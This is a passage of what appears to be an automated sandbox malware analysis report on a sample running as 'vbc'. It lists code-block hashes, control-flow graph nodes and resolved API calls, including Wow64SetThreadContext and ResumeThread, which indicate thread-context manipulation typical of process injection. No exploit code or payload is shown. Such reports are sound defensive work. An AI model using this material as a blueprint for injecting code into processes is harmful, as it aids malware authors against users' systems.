                                              • Opcode ID: f66db5ad74d561a52bf5f288dd0c9f43f324f8b1bede54aff4595bb4d11e54d1
                                              • Instruction ID: a7a4ff8b1bd5373ff7db458bfec62fa06d4d89cb9a0360d7e497bdce91f6f87a
                                              • Opcode Fuzzy Hash: f66db5ad74d561a52bf5f288dd0c9f43f324f8b1bede54aff4595bb4d11e54d1
                                              • Instruction Fuzzy Hash: 5B4199B8D042589BCF10CFA9D884ADEFBB1BF49314F10942AE915B7200D775A916CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2303 68c280-68c2e0 2305 68c2e2-68c2f4 2303->2305 2306 68c2f7-68c345 Wow64SetThreadContext 2303->2306 2305->2306 2308 68c34e-68c39a 2306->2308 2309 68c347-68c34d 2306->2309 2309->2308
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0068C32F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: d9ac8958bfffcd51d965212131e8d52abd26ae7378dc0bc3dd507df4888c5f3e
                                              • Instruction ID: 27877179f6522d285e23096703baec6898a331b2c32177fb4938ba1de7e37763
                                              • Opcode Fuzzy Hash: d9ac8958bfffcd51d965212131e8d52abd26ae7378dc0bc3dd507df4888c5f3e
                                              • Instruction Fuzzy Hash: 4741BDB4D012589FCF10CFA9D884AEEFBB1BF49314F14842AE414B7240D779AA46CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2314 68c160-68c1f4 ResumeThread 2317 68c1fd-68c23f 2314->2317 2318 68c1f6-68c1fc 2314->2318 2318->2317
                                              APIs
                                              • ResumeThread.KERNELBASE(?), ref: 0068C1DE
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 43b296a2dd8d477d8eec188b77d58e0ff59f53464ce89d9c6a050a6b79622e1b
                                              • Instruction ID: 139d6f0fb53646431e240e0c37d3b49f14f5e1cb10be567783dea8a6f40041cb
                                              • Opcode Fuzzy Hash: 43b296a2dd8d477d8eec188b77d58e0ff59f53464ce89d9c6a050a6b79622e1b
                                              • Instruction Fuzzy Hash: 2531B9B4D002589FCF10CFA9E884AAEFBB1AF49314F10942AE815B7300D775A906CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2323 d57278-d572b9 2324 d572c0-d572f2 2323->2324 2325 d572bb 2323->2325 2326 d572f4-d572fa 2324->2326 2325->2324 2327 d57300-d57309 2326->2327 2328 d57312-d57313 2327->2328 2329 d5730b 2327->2329 2330 d57315-d57316 2328->2330 2329->2328 2329->2330 2331 d57475-d574a6 call 68c9f0 2329->2331 2332 d57318-d57329 2330->2332 2333 d574a8-d574cc 2331->2333 2332->2327 2334 d574da-d574e3 2333->2334 2335 d574e5 2334->2335 2336 d574ec-d57c90 2334->2336 2335->2332 2335->2336 2337 d5745c-d5745d 2335->2337 2338 d5745f-d57470 2335->2338 2339 d5732b-d573f8 2335->2339 2336->2334 2345 d584b0-d584b7 2337->2345 2346 d5742a-d57450 2337->2346 2338->2327 2339->2327 2357 d573fe-d573ff 2339->2357 2346->2327 2351 d57456-d57457 2346->2351 2351->2326 2357->2326
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: 71ffac302337c41821d3011fac5b3777465a8709a2a9305f38fd6c481763e5b9
                                              • Instruction ID: 0489c1fa4cf07cf7e7f6e1e305a704c7ba20def445e2c64885c999e05f6d0a28
                                              • Opcode Fuzzy Hash: 71ffac302337c41821d3011fac5b3777465a8709a2a9305f38fd6c481763e5b9
                                              • Instruction Fuzzy Hash: 78514A74D08228CFDB64DF65D8447E9BBB2AB49301F20C0EAD84DA7251DB745AC9DF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2359 d5764a-d58151 2363 d58157-d58162 2359->2363 2364 d5750c-d57549 2359->2364 2365 d574da-d574e3 2363->2365 2364->2365 2367 d574e5 2365->2367 2368 d574ec-d57c90 2365->2368 2367->2368 2369 d5745c-d5745d 2367->2369 2370 d5745f-d57470 2367->2370 2371 d57318-d57329 2367->2371 2372 d5732b-d573f8 2367->2372 2368->2365 2384 d584b0-d584b7 2369->2384 2385 d5742a-d57450 2369->2385 2375 d57300-d57309 2370->2375 2371->2375 2372->2375 2398 d573fe-d573ff 2372->2398 2377 d57312-d57313 2375->2377 2378 d5730b 2375->2378 2382 d57315-d57316 2377->2382 2378->2377 2378->2382 2383 d57475-d574a6 call 68c9f0 2378->2383 2382->2371 2388 d574a8-d574cc 2383->2388 2385->2375 2391 d57456-d57457 2385->2391 2388->2365 2393 d572f4-d572fa 2391->2393 2393->2375 2398->2393
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: efd631fb2cbdd00905cd57cab840b5fd0a712c2dd5d07004dc318731c9d557c2
                                              • Instruction ID: 1c61bc92d3cefede23de7ab4ba504fb216ce5b86f89cbeac9ebc5c17a5f13618
                                              • Opcode Fuzzy Hash: efd631fb2cbdd00905cd57cab840b5fd0a712c2dd5d07004dc318731c9d557c2
                                              • Instruction Fuzzy Hash: 49510874908228CFDB64DF14D844BE9BBB1EB19312F2080E6D84DA3291D7745AC8DF21
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: 7a5e0d0832d3a47f79192de20a02432593ad1a4befec57e541ab9c8ce986c337
                                              • Instruction ID: bbec574d8353b296ffd240402ef30d39001d46b48814a7448634507ab23181ef
                                              • Opcode Fuzzy Hash: 7a5e0d0832d3a47f79192de20a02432593ad1a4befec57e541ab9c8ce986c337
                                              • Instruction Fuzzy Hash: 6751F474909228CFDB64DF24D8847ECB7B1AB09311F2481EAD94DA7281EB745EC8DF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: cb0dbebba24d8ab9eea702ba33c01848833ecd9ab259ef1b424e45f91b7a5ce4
                                              • Instruction ID: 42a4c74c8b0d5ee5806191ed7f8c82cab167412e409e35b9babb492a40aa9620
                                              • Opcode Fuzzy Hash: cb0dbebba24d8ab9eea702ba33c01848833ecd9ab259ef1b424e45f91b7a5ce4
                                              • Instruction Fuzzy Hash: 9D511774904228CFDB64DF28D884BEDB7B1AB09311F2080EAD85DA7251E7745AC8DF21
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: 80d8790e6b57fce7b64540938e2e62286647bd470f65bf4c1f5799a9f4dce789
                                              • Instruction ID: ee3684d54f516a69174e0d6c3ff78eddd882f5f038890e751489bb736099d9f1
                                              • Opcode Fuzzy Hash: 80d8790e6b57fce7b64540938e2e62286647bd470f65bf4c1f5799a9f4dce789
                                              • Instruction Fuzzy Hash: 6E510574908228CFDB64DF28D884BE8B7B1EB59311F2081EAD95DA7240D7749EC8DF21
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: f42682d82b0c98e422573d21746a1d5e1d00950e2a59c1b51f04db4f8617fd53
                                              • Instruction ID: 89587e8277df691af5657bcd09600eb76caab9add266a838e99bdeee1e0dbc9d
                                              • Opcode Fuzzy Hash: f42682d82b0c98e422573d21746a1d5e1d00950e2a59c1b51f04db4f8617fd53
                                              • Instruction Fuzzy Hash: 83510774908228CFDB64DF14D884BDCB7B1AB19311F2081E9D95DA7241EB745AC4DF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: f0737bac5631e51585b2bd1c8d37c14421d643e66853d7acf07e0a578afa999d
                                              • Instruction ID: 1a9946a11c715e47713b4b82bb2460d035a09f044bd07ddb678ce93efd7a59d6
                                              • Opcode Fuzzy Hash: f0737bac5631e51585b2bd1c8d37c14421d643e66853d7acf07e0a578afa999d
                                              • Instruction Fuzzy Hash: 4D510774908228CFDB64DF14D884BE8B7B1AB19311F2084EAD95DA3290D7749EC8DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: ff419880a88728545c6f9768f56b10d170f0eee28756b94b1fae922078d0b9d6
                                              • Instruction ID: 4ddeca495507efe9e752a80e08e0b614e258db8d94e892970aa1bcbb95a14072
                                              • Opcode Fuzzy Hash: ff419880a88728545c6f9768f56b10d170f0eee28756b94b1fae922078d0b9d6
                                              • Instruction Fuzzy Hash: 2A514A74908229CFDB64DF14D884BE8B7B1FB19311F2081EAD95DA7291DB749AC8DF20
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: b80350c6148c77e8796b000a1ea73d6409a6c40db097e20eeacf62981abff398
                                              • Instruction ID: 70ef361fed0b090c54bab74a599856c486cb1743ebe759ccdd60bd0e80f8d853
                                              • Opcode Fuzzy Hash: b80350c6148c77e8796b000a1ea73d6409a6c40db097e20eeacf62981abff398
                                              • Instruction Fuzzy Hash: 8E510674908229CFDB64DF14D884BE9BBB1FB19311F2080EAD95DA3250E7749AC8DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: 13faf6a9840c1feba65ca288e6159918503d62ff95285f441a7ff91bf863ced5
                                              • Instruction ID: ed1688abe2a88906abe4450216f9233bc4af250a3729f1b63e4f7138aa845934
                                              • Opcode Fuzzy Hash: 13faf6a9840c1feba65ca288e6159918503d62ff95285f441a7ff91bf863ced5
                                              • Instruction Fuzzy Hash: E9511774908229CFDB64DF14D884BE8B7B5FB19312F2080E6D95DA7251E7749AC8DF20
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )
                                              • API String ID: 0-2427484129
                                              • Opcode ID: bebdec410e72d572c880ca63431186638fb1261e7c53990da66ac3ee84ada56a
                                              • Instruction ID: 2acc25df08fc2eced439e5cdbad1303447a13f4debfacacf80fbbf1b06485bc2
                                              • Opcode Fuzzy Hash: bebdec410e72d572c880ca63431186638fb1261e7c53990da66ac3ee84ada56a
                                              • Instruction Fuzzy Hash: 56511774904229CFDB64DF14D884BE8B7B1EB19311F2080EAD95DA3250E7749EC8DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: E
                                              • API String ID: 0-3568589458
                                              • Opcode ID: 9fa377c2c6b55fb7716dab927a3c01f82f00a9c97d46a0f4a55ca5486bb452db
                                              • Instruction ID: c521b52948381e951085669c8ce83e2f5bd1d87cc2b199d4467dc77981e4e59c
                                              • Opcode Fuzzy Hash: 9fa377c2c6b55fb7716dab927a3c01f82f00a9c97d46a0f4a55ca5486bb452db
                                              • Instruction Fuzzy Hash: BE21F3B4E042998FCF41DFA8C884AEEBBF1BF0A314F6140A9C519EB241E7389945CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "
                                              • API String ID: 0-123907689
                                              • Opcode ID: 66726dc535759cbb2eb98f385cc8a4be4cc508be64b4b30c7ce8024493a156a3
                                              • Instruction ID: 850716f6bcf5e681de31cd4a448c211f22b8cc6f77256e20331ed3a2e37890c0
                                              • Opcode Fuzzy Hash: 66726dc535759cbb2eb98f385cc8a4be4cc508be64b4b30c7ce8024493a156a3
                                              • Instruction Fuzzy Hash: F6F03034908168CFCF24DF61E8047ECB779AB0A312F1055D5C95A672A1D7745F85CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 027a23b4bb901e6ad0373f25d8278b09524932fbeaf5e8f1bbf3c33e9232ec79
                                              • Instruction ID: 93d0a0f2ae2ea0de2740b4504c3b42b47f9d8a9c692422a9f8dcbca59e4f187f
                                              • Opcode Fuzzy Hash: 027a23b4bb901e6ad0373f25d8278b09524932fbeaf5e8f1bbf3c33e9232ec79
                                              • Instruction Fuzzy Hash: 8261F674D542688FDF90DFA9C980BDDBBB2BB48314FA481A9D50DA7201EB319991CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 084e15352df6d713a3e9ad033b28781e64ff5743baf2597eb2a158d0f6e29e74
                                              • Instruction ID: e0f253e836984cbd8dc2ec36fb9ec61bb3421f67d4653fc72449aa5e9b543aa4
                                              • Opcode Fuzzy Hash: 084e15352df6d713a3e9ad033b28781e64ff5743baf2597eb2a158d0f6e29e74
                                              • Instruction Fuzzy Hash: DC516630E102599FCB04EFA4C895AEEB7B2FF88304F118429E915773A5DB346D52CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f187d932314b160e9958fe4463e42db7e2dd17918a2cb7288b529e77e3b2bdb5
                                              • Instruction ID: 4f134fce15f30d77e05061b77e9b79249b94b84ad71fdf51e7d508c709f525b6
                                              • Opcode Fuzzy Hash: f187d932314b160e9958fe4463e42db7e2dd17918a2cb7288b529e77e3b2bdb5
                                              • Instruction Fuzzy Hash: 3C51BEB4E15259DFCF50CFA9D984ADDBBF1BB49300F20902AE819AB315E770A951CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ec14060e991ade643601e7eac7c3535adcf1e6f4b22d75381339ea6a8436eef1
                                              • Instruction ID: 9139ceaedb4f60689e6a75fc0bca5736d6b0b88e258a0f2f89b189269ec635e3
                                              • Opcode Fuzzy Hash: ec14060e991ade643601e7eac7c3535adcf1e6f4b22d75381339ea6a8436eef1
                                              • Instruction Fuzzy Hash: 7E51AEB4E15259DFCF50CFA9D980ADDBBF1BB49300F20902AE819AB315E770A951DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd53d09b7ae06877444c783388ea4f58a00ec81386bc6707b9918a4f79dd7425
                                              • Instruction ID: f36ed057675d37a91d1d999ccad3b1508af69f450692a6084cdc1b360190e172
                                              • Opcode Fuzzy Hash: cd53d09b7ae06877444c783388ea4f58a00ec81386bc6707b9918a4f79dd7425
                                              • Instruction Fuzzy Hash: 2A312474D04249DFCB04CFA6D848AEDBBB2BF89304F10806AD919B73A1DB345A55CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 629658465dee3e40085f0f8bb8510be8b97410925fbec56d824214d12cb9f869
                                              • Instruction ID: ad2cb5ecdfd5c16ae900c5c7708eb7235ef41e34cc6b4425b19256ed8e319483
                                              • Opcode Fuzzy Hash: 629658465dee3e40085f0f8bb8510be8b97410925fbec56d824214d12cb9f869
                                              • Instruction Fuzzy Hash: DE310474E002589FCB05DFA8D940AEEBBB2FF89304F10802AD915B7365EB345A15CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe3b43459e28cd55b4f08177c4df70e5981155c5191cdb0f7299b001af4a4c50
                                              • Instruction ID: 7b24fd42708d7835b0b4ab0761eb94fbb59f96c2a063edff285d904bb978e0a1
                                              • Opcode Fuzzy Hash: fe3b43459e28cd55b4f08177c4df70e5981155c5191cdb0f7299b001af4a4c50
                                              • Instruction Fuzzy Hash: B931D274E6029ACFCF04CFEAC8405EEBBF5AB49311F61942AD409EB304E7719950CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9b7c381d9e10d5f41a57c5357454fe82887e1c9fae273ee6e831980fcb8ec122
                                              • Instruction ID: fd7894ef8f4a57ee50d33676e5743f0ccb77e021e6d806dc6176b8214eebe576
                                              • Opcode Fuzzy Hash: 9b7c381d9e10d5f41a57c5357454fe82887e1c9fae273ee6e831980fcb8ec122
                                              • Instruction Fuzzy Hash: F8310474E042189BCF04DFA9D845AEEBBB6EF89301F10842AE919B7391DB345945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996714996.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_27d000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 992c20b0e9a702c138374c38f52a5dc81e3518122e92794abd87f3faefd74640
                                              • Instruction ID: 3f050534a542595480d5991d9f921f07eb1f273b73824ae8b1913471ad865ce1
                                              • Opcode Fuzzy Hash: 992c20b0e9a702c138374c38f52a5dc81e3518122e92794abd87f3faefd74640
                                              • Instruction Fuzzy Hash: AE21D075618244EFDB01DF14D980B2ABBB1FF88314F24C6A9ED095B247C376D816CA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996714996.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_27d000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aff03a3603da3eb2308d73c630dae57eb6231c8436cac8eec31101518be0a04a
                                              • Instruction ID: 69c127aa5d52c0d226c4741205ddeddb57137159cb5a124637e3e9cbb5e0128e
                                              • Opcode Fuzzy Hash: aff03a3603da3eb2308d73c630dae57eb6231c8436cac8eec31101518be0a04a
                                              • Instruction Fuzzy Hash: 2C21F275618244DFCB14DF24D984B2ABB71EF88314F24C6A9E90D4B246C37BD826CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 53802bd24d762a7795c4f5f867b866aa6b3b95d7ebd28fa9a5039cda593f3132
                                              • Instruction ID: ae93bf8905c6c62153880a8d3ed05afa65ee9d1c84f24b7ed448a2bd0fd70015
                                              • Opcode Fuzzy Hash: 53802bd24d762a7795c4f5f867b866aa6b3b95d7ebd28fa9a5039cda593f3132
                                              • Instruction Fuzzy Hash: 0C21BF74A10258CFCB64DFB9D884A9DBBB1BF49315F6184AAD50AE7321DB319C81CF10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7f0e8a4006478be028eb5dc142373b793e89704bf4801314982ba6e0558275b
                                              • Instruction ID: 1b0e3c095350d875433a14466ea86201c6fd27e3aa4e88a53e89e250f54e9029
                                              • Opcode Fuzzy Hash: e7f0e8a4006478be028eb5dc142373b793e89704bf4801314982ba6e0558275b
                                              • Instruction Fuzzy Hash: 56213670D04209CFCF14DFA9C4496AEBBB1BB48306F24C16ACD08A7342DB349985CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996714996.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_27d000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5fdd61cc78fa8b0271b15ee988ff135bbcafa15b7f311d81ffe14a96fa7acde
                                              • Instruction ID: 855fca0aa41117dab70bfce320838195643b1484c0957c5fa64b67569e2305d0
                                              • Opcode Fuzzy Hash: b5fdd61cc78fa8b0271b15ee988ff135bbcafa15b7f311d81ffe14a96fa7acde
                                              • Instruction Fuzzy Hash: B8215B755093C08FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A981ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 157cd3ebcd93d1913a994f049397d6b5a121d6ca59bffe0dde08df82de2f41ba
                                              • Instruction ID: 0e9f1eabeae220c0ec0aaec9e4ac546a5fa4c9d666618da8daa02053944378de
                                              • Opcode Fuzzy Hash: 157cd3ebcd93d1913a994f049397d6b5a121d6ca59bffe0dde08df82de2f41ba
                                              • Instruction Fuzzy Hash: A9116D74D082489FCB01CFA8D89569DBFB0AB45315F24C1AAD848E3302D7319985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f72f576be6e6b71a5185ef2e2c2bb27f3d101ff1930df668a9a866a541ce139
                                              • Instruction ID: f6044cc63deb6a77aeeb53f08a5daa610962133ae35ac11a5ec7d8f9d4d9b8f3
                                              • Opcode Fuzzy Hash: 5f72f576be6e6b71a5185ef2e2c2bb27f3d101ff1930df668a9a866a541ce139
                                              • Instruction Fuzzy Hash: 8B11B274E002199FCB00CFA8D485ADEBBB1EB48301F1185AAD914A7351D731AE55CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996714996.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_27d000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3da50a5e5ca0ffb5633ccb237e622e82761356e0ffc5c016c5ff7c56a27bafb7
